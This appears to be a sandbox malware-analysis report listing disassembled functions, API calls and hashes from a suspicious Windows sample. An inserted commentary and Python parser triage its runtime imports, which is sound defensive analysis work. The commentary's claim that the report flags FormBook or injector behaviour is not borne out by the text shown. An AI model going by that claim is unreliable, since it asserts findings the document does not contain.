                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 00f72b056da5265264a23e6060e9acd5ffa9e684265bf2ed60474deed1c2bac6
                                                                                              • Instruction ID: 98cc4f85cf8f731f65929cfd3f9f0f9570419f185e93081bdac1304474d1d86b
                                                                                              • Opcode Fuzzy Hash: 00f72b056da5265264a23e6060e9acd5ffa9e684265bf2ed60474deed1c2bac6
                                                                                              • Instruction Fuzzy Hash: C2E14DB55083908FC344CF69D49146BBBF0AF99300F464A6EF5D8A7352D334EA1ADB62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d03f6d491a945607947d19f940b1a1745a3d664169419562031b70a47b71c96f
                                                                                              • Instruction ID: ac113c690091023488edda87dd6a57814f81e0f296dc8242a5e2b4bf2e548204
                                                                                              • Opcode Fuzzy Hash: d03f6d491a945607947d19f940b1a1745a3d664169419562031b70a47b71c96f
                                                                                              • Instruction Fuzzy Hash: CC9145312483418BD724DE68D884BEE77D2EFD0308F18993DE99EA7282E67598858753
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ac0d2d26ce87e3266be6edb276cbdf3590fd04a1faafd93c7f5910a3a53c1917
                                                                                              • Instruction ID: 8d2198c5b758efe8cf28cca6070bf6740503b33d14d6fe46751c1d657297bf35
                                                                                              • Opcode Fuzzy Hash: ac0d2d26ce87e3266be6edb276cbdf3590fd04a1faafd93c7f5910a3a53c1917
                                                                                              • Instruction Fuzzy Hash: 82615A31640A0856DE38BAA858D97FE73E49B0770CF70341AE84EFB2E2D6359D468375
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                              • Instruction ID: c5464a02204666825f29a0078b03f78db52a6013afcfcfecba3bf25e8e25e19d
                                                                                              • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                              • Instruction Fuzzy Hash: B6519821300B499ADF34B9688C567FF23D99B03348F283549E64EFB782C721AD45C726
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b2bf8d12a0b5834a57f5373b763d9bd3b6751a2a6bc9a279013d22f8352f4edb
                                                                                              • Instruction ID: 1e1410ce846ebb1dd9f1c934b849d5a5d8c3ebcc5438cb39aa0a563eda3dfa07
                                                                                              • Opcode Fuzzy Hash: b2bf8d12a0b5834a57f5373b763d9bd3b6751a2a6bc9a279013d22f8352f4edb
                                                                                              • Instruction Fuzzy Hash: DE51E8715083954FC711DF28844056EBFE0AEDA318F4A9999E4D96B183D330EA4ACB52
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 204fcaa179abd8d6a43581dfc420ebca335be1531f8564926305292251ccdff4
                                                                                              • Instruction ID: ce6cdb4d62cba588d17814f0f02d313b8d88a715544efbea6df59f5597ed7d5c
                                                                                              • Opcode Fuzzy Hash: 204fcaa179abd8d6a43581dfc420ebca335be1531f8564926305292251ccdff4
                                                                                              • Instruction Fuzzy Hash: 6A51DDB2A087119FC758CF29D48055AF7E1FF88314F058A2EF899E7340DB30E9598B96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                                                              • Instruction ID: fdee1de57d903c17b849dcadf665bf07236795ddb02a816a26148a6f69657d42
                                                                                              • Opcode Fuzzy Hash: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                                                              • Instruction Fuzzy Hash: BA31F0B16547068FCB14DF28D85116EBBE1EB95344F189A3DE49AE3342C335E809CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                                                                              • Instruction ID: e3cd71a49ed94c43fecec04639609a25b47b4ba8794abf6de14c3ec0726191ae
                                                                                              • Opcode Fuzzy Hash: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                                                                              • Instruction Fuzzy Hash: 20410A30545B11CFC71ADF34E4559A6B7E0FF8A704B125CAFD06A9B221EB30EA04DB59
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                              • Instruction ID: 71c6795849f89eb395536bee67d5681e3699d4a8b02f230c92a5bddc8172e296
                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                              • Instruction Fuzzy Hash: 7C11B177A0004147D605A67ED4B41FBE395FBC532972C7375D04E6B7DAC222D900A700
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00E73EEA
                                                                                                • Part of subcall function 00E6F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E6F6CD
                                                                                                • Part of subcall function 00E789ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00EAE088,?,00000007,00E733E2,?,?,00000050,522FB702), ref: 00E78A0A
                                                                                              • _strlen.LIBCMT ref: 00E73F0B
                                                                                              • SetDlgItemTextW.USER32(?,00EA919C,?), ref: 00E73F64
                                                                                              • GetWindowRect.USER32(?,?), ref: 00E73F9A
                                                                                              • GetClientRect.USER32(?,?), ref: 00E73FA6
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E74051
                                                                                              • GetWindowRect.USER32(?,?), ref: 00E74081
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00E740B0
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00E740B8
                                                                                              • GetWindow.USER32(?,00000005), ref: 00E740C3
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00E740F3
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00E74165
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                              • String ID: $%s:$CAPTION$d$qI
                                                                                              • API String ID: 2407758923-2243056709
                                                                                              • Opcode ID: e3f730f0a2c60fca8b84e6aff4075f39fd1de1687a89924b70e4d09f6993bb8b
                                                                                              • Instruction ID: 7fe347488d1039c85b62a81429c7e0782942af4ecbb4a0c9d02dcd51403c170c
                                                                                              • Opcode Fuzzy Hash: e3f730f0a2c60fca8b84e6aff4075f39fd1de1687a89924b70e4d09f6993bb8b
                                                                                              • Instruction Fuzzy Hash: 8A81A0B2509301AFD714DF68CD89A6FBBE9EBC9704F00591DF989A3291D730E909CB52
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00EB60E0,00000FA0,?,?,00E86185), ref: 00E861B3
                                                                                              • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00E86185), ref: 00E861BE
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00E86185), ref: 00E861CF
                                                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E861E1
                                                                                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E861EF
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00E86185), ref: 00E86212
                                                                                              • DeleteCriticalSection.KERNEL32(00EB60E0,00000007,?,?,00E86185), ref: 00E86235
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00E86185), ref: 00E86245
                                                                                              Strings
                                                                                              • WakeAllConditionVariable, xrefs: 00E861E7
                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E861B9
                                                                                              • SleepConditionVariableCS, xrefs: 00E861DB
                                                                                              • kernel32.dll, xrefs: 00E861CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                              • API String ID: 2565136772-3242537097
                                                                                              • Opcode ID: 3b400570de86ebf31c7b94a9d3bd6e1f96b19123fb827625c4dd39ef2ab71b56
                                                                                              • Instruction ID: e8e46d8455882794540903ffd14fbfe54959ee44237d3dc442edcc65f5cb08b8
                                                                                              • Opcode Fuzzy Hash: 3b400570de86ebf31c7b94a9d3bd6e1f96b19123fb827625c4dd39ef2ab71b56
                                                                                              • Instruction Fuzzy Hash: 29019E70A40311EFCA307B77AC0DB572AA8EB44B45F105523F95DF2260EA64C8048B32
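The entry above (InitializeCriticalSectionAndSpinCount with a spin count of 0xFA0, GetModuleHandleW on api-ms-win-core-synch-l1-2-0.dll with a kernel32.dll fallback, GetProcAddress for SleepConditionVariableCS and WakeAllConditionVariable, and a manual-reset CreateEventW as the last-resort fallback) is the Visual C++ runtime's thread-safe statics initialiser. It is compiled into every modern MSVC binary and is not, by itself, evidence of the FormBook or AutoIt-injector behaviour this report flags. The Python below is an added example, not part of the Joe Sandbox report: it parses the "APIs" listing format used on this page, pulls out the module and symbol names that the sample resolves at run time through GetModuleHandleW/GetProcAddress (the dynamic imports an analyst would triage), and recognises this particular runtime idiom so it can be filtered out. The sample inputs are copied from entries on this page; the recognition rule in `is_vcruntime_tss_init` is my own heuristic, not something the report states.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: the "APIs" listing of the function at 00E861B3..00E86245,
# copied verbatim from the report above so the example runs offline.
SAMPLE_TSS = """
• InitializeCriticalSectionAndSpinCount.KERNEL32(00EB60E0,00000FA0,?,?,00E86185), ref: 00E861B3
• GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00E86185), ref: 00E861BE
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00E86185), ref: 00E861CF
• GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E861E1
• GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E861EF
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00E86185), ref: 00E86212
• DeleteCriticalSection.KERNEL32(00EB60E0,00000007,?,?,00E86185), ref: 00E86235
• CloseHandle.KERNEL32(00000000,?,?,00E86185), ref: 00E86245
"""

# Constructed sample: two lines from other entries on this page, to exercise the
# "Part of subcall function" form and the no-argument CRT form.
SAMPLE_OTHER = """
  • Part of subcall function 00E6F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E6F6CD
• _strlen.LIBCMT ref: 00E73F0B
"""

# One bullet line:  • [Part of subcall function PARENT: ]API.MODULE[(ARGS)], ref: ADDR
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@?$]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Arguments the sandbox could not resolve ('?') or that are bare 32-bit values.
HEX_OR_UNKNOWN = re.compile(r"^(?:\?|[0-9A-Fa-f]{8})$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    parent: Optional[str] = None  # set for "Part of subcall function" lines


def parse_api_calls(text: str) -> List[ApiCall]:
    """Parse the report's 'APIs' bullet list; headers and blank lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref"), m.group("parent")))
    return calls


def dynamic_imports(calls: List[ApiCall]) -> Tuple[List[str], List[str]]:
    """Return (module names, symbol names) resolved at run time.

    Module names come from the first argument of GetModuleHandle*/LoadLibrary*,
    symbol names from the second argument of GetProcAddress. Unresolved or
    numeric arguments are ignored.
    """
    modules: List[str] = []
    procs: List[str] = []
    for c in calls:
        if c.api.startswith(("GetModuleHandle", "LoadLibrary")) and c.args:
            if not HEX_OR_UNKNOWN.match(c.args[0]):
                modules.append(c.args[0])
        elif c.api == "GetProcAddress" and len(c.args) >= 2:
            if not HEX_OR_UNKNOWN.match(c.args[1]):
                procs.append(c.args[1])
    return modules, procs


VCRUNTIME_TSS_PROCS = {"SleepConditionVariableCS", "WakeAllConditionVariable"}


def is_vcruntime_tss_init(calls: List[ApiCall]) -> bool:
    """Heuristic (my assumption, not from the report): the function is the VC
    runtime's thread-safe statics initialiser when exactly these two condition
    variable routines are resolved from the synch API set and the critical
    section plus event fallback are present. Such entries are runtime noise."""
    modules, procs = dynamic_imports(calls)
    apis = {c.api for c in calls}
    return (set(procs) == VCRUNTIME_TSS_PROCS
            and "api-ms-win-core-synch-l1-2-0.dll" in modules
            and {"InitializeCriticalSectionAndSpinCount", "CreateEventW"} <= apis)


if __name__ == "__main__":
    calls = parse_api_calls(SAMPLE_TSS)
    mods, procs = dynamic_imports(calls)
    print("modules:", mods)
    print("procs:  ", procs)
    print("vcruntime thread-safe statics:", is_vcruntime_tss_init(calls))
```

Run the same parser over every function entry in the report and keep only those whose resolved symbol names are not explained by a known runtime idiom; for this sample the interesting dynamic resolution sits in the injector stages the report flags elsewhere, not in this CRT block.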
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 00E93816
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E933CE
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E933E0
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E933F2
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E93404
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E93416
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E93428
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E9343A
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E9344C
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E9345E
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E93470
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E93482
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E93494
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E934A6
                                                                                              • _free.LIBCMT ref: 00E9380B
                                                                                                • Part of subcall function 00E903D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?), ref: 00E903EA
                                                                                                • Part of subcall function 00E903D4: GetLastError.KERNEL32(?,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?,?), ref: 00E903FC
                                                                                              • _free.LIBCMT ref: 00E9382D
                                                                                              • _free.LIBCMT ref: 00E93842
                                                                                              • _free.LIBCMT ref: 00E9384D
                                                                                              • _free.LIBCMT ref: 00E9386F
                                                                                              • _free.LIBCMT ref: 00E93882
                                                                                              • _free.LIBCMT ref: 00E93890
                                                                                              • _free.LIBCMT ref: 00E9389B
                                                                                              • _free.LIBCMT ref: 00E938D3
                                                                                              • _free.LIBCMT ref: 00E938DA
                                                                                              • _free.LIBCMT ref: 00E938F7
                                                                                              • _free.LIBCMT ref: 00E9390F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: 017098ab5fe003ed9471c8e0897a26e2939ee523f40963adb1f92b6e605c888a
                                                                                              • Instruction ID: 740d9478eb780f8308351dbac99bae607ae3da7d50231da268cd73176173bd79
                                                                                              • Opcode Fuzzy Hash: 017098ab5fe003ed9471c8e0897a26e2939ee523f40963adb1f92b6e605c888a
                                                                                              • Instruction Fuzzy Hash: 43316931604304AFEF34AA79EC45B6AB3E8EF40314F54642AF458F7591DEB1AE84CB20
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E7D919
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                              • _wcslen.LIBCMT ref: 00E7D97B
                                                                                              • _wcslen.LIBCMT ref: 00E7D99A
                                                                                              • _wcslen.LIBCMT ref: 00E7D9B6
                                                                                              • _strlen.LIBCMT ref: 00E7DA14
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,00E9D9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 00E7DA2D
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00E7DA54
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
                                                                                              • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                              • API String ID: 1185167184-1533471033
                                                                                              • Opcode ID: dc2f8a5713fca2e4caa5353626bc2a5a6f64fc643f8989b7d0044503c9c00739
                                                                                              • Instruction ID: 40e9e1c2b3dc5443c3acd10de8902635395bd51461ebf6c0d2e8ab7943cb41e6
                                                                                              • Opcode Fuzzy Hash: dc2f8a5713fca2e4caa5353626bc2a5a6f64fc643f8989b7d0044503c9c00739
                                                                                              • Instruction Fuzzy Hash: 26518E71D04218AFEF05EBE0CC46BEEBBB8EF45310F14601AE509BB181DBA05E45CBA1
                                                                                              APIs
                                                                                              • GetWindow.USER32(?,00000005), ref: 00E837C4
                                                                                              • GetClassNameW.USER32(00000000,?,00000080), ref: 00E837F0
                                                                                                • Part of subcall function 00E78DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00E70E3F,?,?,?,00000046,00E71ECE,00000046,?,exe,00000046), ref: 00E78DBA
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E8380C
                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00E83823
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00E83837
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00E83860
                                                                                              • DeleteObject.GDI32(00000000), ref: 00E83867
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00E83870
                                                                                              Strings
